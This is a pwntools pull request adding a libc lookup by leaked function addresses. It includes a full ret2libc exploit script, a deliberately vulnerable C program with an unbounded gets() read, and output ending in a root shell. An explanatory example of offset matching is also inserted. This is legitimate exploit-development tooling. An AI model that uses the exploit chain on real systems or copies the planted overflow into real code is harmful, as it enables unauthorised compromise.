
Add search for libc binary by leaked function addresses #2103

Merged
merged 6 commits into from Mar 22, 2023

Conversation

peace-maker
Member

When you're able to leak addresses of the libc library, use libcdb.search_by_symbol_offsets() to find and download the matching libc library from https://libc.rip/.

If there are multiple matches, the user is prompted to select one interactively. The selection can be saved in the code for future executions of the script.

```python
from pwn import *

exe = context.binary = ELF('./vuln')

io = process('./vuln')
# the target prints the runtime addresses of puts and printf, one per line
puts_leak = int(io.recvline(), 0)
printf_leak = int(io.recvline(), 0)

# find the libc build whose symbol offsets fit both leaks and load it;
# when several builds match, the user is prompted to pick one
libc = ELF(libcdb.search_by_symbol_offsets({'puts': puts_leak, 'printf': printf_leak}))
libc.address = puts_leak - libc.sym.puts

rop = ROP(libc)
rop.call(rop.ret)
rop.system(next(libc.search(b'/bin/sh\x00')))

io.sendline(flat({0x28: rop.chain()}))
io.interactive()
```

```c
// gcc -fno-stack-protector -o vuln vuln.c
#include <stdio.h>

int main(int argc, char* argv[]) {
    char buf[0x20];
    printf("%p\n%p\n", puts, printf);   /* leak two libc addresses */
    gets(buf);                          /* deliberately unbounded read */
    return 0;
}
```
```
$ python expl.py
[*] 'vuln'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './vuln': pid 1894
[*] Multiple matching libc libraries for requested symbols:
[*] 1. libc6_2.31-0ubuntu9.8_amd64
        BuildID:     c9d56de82ddd00d822d6100034f3075ef1709cd2
        MD5:         993088888bcc0bf78d74e1e8ca0d33a6
        SHA1:        957a705e586fcefc6a3330b78a66d070a00d72ec
        SHA256:      e29f30c7204d46c55fb1ac1323707cae0884a189b82a24a144861c1e6220da6d
        Symbols:
            __libc_start_main_ret = 0x24083
                             dup2 = 0x10e8c0
                           printf = 0x61c90
                             puts = 0x84420
                             read = 0x10dfc0
                       str_bin_sh = 0x1b45bd
                           system = 0x52290
                            write = 0x10e060
[*] 2. libc6_2.31-0ubuntu9.9_amd64
        BuildID:     1878e6b475720c7c51969e69ab2d276fae6d1dee
        MD5:         5898fac5d2680d0d8fefdadd632b7188
        SHA1:        1430c57bf7ca6bd7f84a11c2cb7580fc39da07f5
        SHA256:      80378c2017456829f32645e6a8f33b4c40c8efa87db7e8c931a229afa7bf6712
        Symbols:
            __libc_start_main_ret = 0x24083
                             dup2 = 0x10e8c0
                           printf = 0x61c90
                             puts = 0x84420
                             read = 0x10dfc0
                       str_bin_sh = 0x1b45bd
                           system = 0x52290
                            write = 0x10e060
 [?] Select the libc version to use:
       1) libc6_2.31-0ubuntu9.8_amd64
    2> 2) libc6_2.31-0ubuntu9.9_amd64
[-] Downloading 'https://gitlab.com/libcdb/libcdb/raw/master/hashes/build_id/1878e6b475720c7c51969e69ab2d276fae6d1dee': Got code 404
[!] Could not fetch libc for build_id 1878e6b475720c7c51969e69ab2d276fae6d1dee from libcdb
[+] Downloading 'https://libc.rip/download/libc6_2.31-0ubuntu9.9_amd64.so': 1.94MB
[+] Downloading 'https://debuginfod.systemtap.org/buildid/1878e6b475720c7c51969e69ab2d276fae6d1dee/debuginfo': 5.19MB
[+] Starting local process '/usr/bin/eu-unstrip': pid 1899
[+] Receiving all data: Done (0B)
[*] Process '/usr/bin/eu-unstrip' stopped with exit code 0 (pid 1899)
[*] '/root/.cache/.pwntools-cache-3.8/libcdb/build_id/1878e6b475720c7c51969e69ab2d276fae6d1dee'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Loaded 196 cached gadgets for '/root/.cache/.pwntools-cache-3.8/libcdb/build_id/1878e6b475720c7c51969e69ab2d276fae6d1dee'
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) groups=0(root)
$
[*] Stopped process './vuln' (pid 1894)
```

Fixes #1867
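The following is an added example, not code from pwntools or this PR. It shows why the lookup above reports two candidates for the same leaks and how the "first match per hash" rule from the second commit collapses duplicate index entries: the database, the `infer_base`, `find_candidates` and `dedupe_by_build_id` helpers and the leaked values are all constructed here, with the symbol offsets and BuildIDs taken from the output printed above.

```python
# Added example, not from the pwntools PR: the matching a lookup such as
# libcdb.search_by_symbol_offsets() performs, plus the duplicate handling of
# the PR's second commit. ASLR moves libc each run, but the mapping stays
# page-aligned, so leak - offset must be one page-aligned base for all leaks.
PAGE_MASK = 0xFFF

# Constructed local database: the two Ubuntu builds from the PR's output
# (offsets and BuildIDs as printed there), the 0ubuntu9.9 entry listed twice
# to mimic a library indexed more than once, and one made-up build.
LIBC_DB = [
    {"id": "libc6_2.31-0ubuntu9.8_amd64",
     "build_id": "c9d56de82ddd00d822d6100034f3075ef1709cd2",
     "symbols": {"puts": 0x84420, "printf": 0x61c90, "system": 0x52290}},
    {"id": "libc6_2.31-0ubuntu9.9_amd64",
     "build_id": "1878e6b475720c7c51969e69ab2d276fae6d1dee",
     "symbols": {"puts": 0x84420, "printf": 0x61c90, "system": 0x52290}},
    {"id": "libc6_2.31-0ubuntu9.9_amd64",  # duplicate index entry
     "build_id": "1878e6b475720c7c51969e69ab2d276fae6d1dee",
     "symbols": {"puts": 0x84420, "printf": 0x61c90, "system": 0x52290}},
    {"id": "libc6_fake-build_amd64",  # constructed build that must not match
     "build_id": "0000000000000000000000000000000000000000",
     "symbols": {"puts": 0x80ed0, "printf": 0x60770, "system": 0x50d60}},
]

def infer_base(symbols, leaks):
    """Libc base implied by the leaks for this build, or None if a leaked
    symbol is unknown, the bases disagree, or the base is not page-aligned."""
    if not leaks or any(name not in symbols for name in leaks):
        return None
    bases = {addr - symbols[name] for name, addr in leaks.items()}
    base = bases.pop()
    return base if not bases and not base & PAGE_MASK else None

def find_candidates(db, leaks):
    """Every database entry consistent with all leaked addresses."""
    return [e for e in db if infer_base(e["symbols"], leaks) is not None]

def dedupe_by_build_id(matches):
    """Keep the first entry per BuildID: the same hash means the same file."""
    seen, unique = set(), []
    for e in matches:
        if e["build_id"] not in seen:
            seen.add(e["build_id"])
            unique.append(e)
    return unique

if __name__ == "__main__":
    leaks = {"puts": 0x7f1b2c458420, "printf": 0x7f1b2c435c90}  # constructed
    for e in dedupe_by_build_id(find_candidates(LIBC_DB, leaks)):
        print(e["id"], hex(infer_base(e["symbols"], leaks)))
```

Both Ubuntu builds survive because their puts and printf offsets are identical, which is exactly the situation in which the real lookup has to prompt.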

When you're able to leak addresses of the libc library, use `libcdb.search_by_symbol_offsets()` to find and download the matching libc library from https://libc.rip.

If there are multiple matches, the user is prompted to select one interactively. The selection can be saved in the code for future executions of the script.

Fixes Gallopsled#1867
Sometimes the same library appears to be indexed multiple times (see 0b52d2e713d243f0f65d808fcd3fbe372bb3cd32). Handle that situation by selecting the first in the list, since they should all be identical given the same hash value.
@peace-maker peace-maker changed the title Add search of libc binary by leaked function addresses Add search for libc binary by leaked function addresses Aug 29, 2022
@gsingh93
Contributor

It would be great to support a local version of this based off of the scripts in https://github.com/niklasb/libc-database instead of the website. I'd want to have access to this feature without any internet connectivity.

@peace-maker
Member Author

Indeed, but that would fit better into a separate contribution, since it'd touch the other libcdb.search_by_* functions as well. Do you want to add it?

@Arusekk Arusekk merged commit aa48227 into Gallopsled:dev Mar 22, 2023
@peace-maker peace-maker deleted the libc_offset_lookup branch March 22, 2023 13:57
gogo2464 pushed a commit to gogo2464/pwntools that referenced this pull request Sep 10, 2023

* libcdb: Add option to search by function offsets

When you're able to leak addresses of the libc library, use `libcdb.search_by_symbol_offsets()` to find and download the matching libc library from https://libc.rip.

If there are multiple matches, the user is prompted to select one interactively. The selection can be saved in the code for future executions of the script.

Fixes Gallopsled#1867

* libcdb: Handle multiple results when looking up by hash

Sometimes the same library appears to be indexed multiple times (see 0b52d2e713d243f0f65d808fcd3fbe372bb3cd32). Handle that situation by selecting the first in the list, since they should all be identical given the same hash value.

* Update CHANGELOG

* Fix off-by-one when pre-selecting a libc

* Do .json() only once

---------

Co-authored-by: Arusekk <arek_koz@o2.pl>
Successfully merging this pull request may close these issues.

Support for libc databases with offsets using https://libc.rip/api/